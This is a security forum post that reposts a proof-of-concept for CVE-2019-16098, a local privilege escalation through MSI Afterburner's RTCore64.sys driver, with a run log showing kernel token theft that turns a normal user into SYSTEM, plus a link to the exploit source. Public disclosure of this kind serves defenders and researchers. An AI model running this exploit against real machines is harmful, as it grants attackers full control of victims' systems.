Jump to content
Nytro

Local privilege escalation PoC exploit for CVE-2019-16098

Recommended Posts

CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.

For more updates, visit CVE-2019-16098

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>

 

Sursa: https://github.com/Barakat/CVE-2019-16098

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...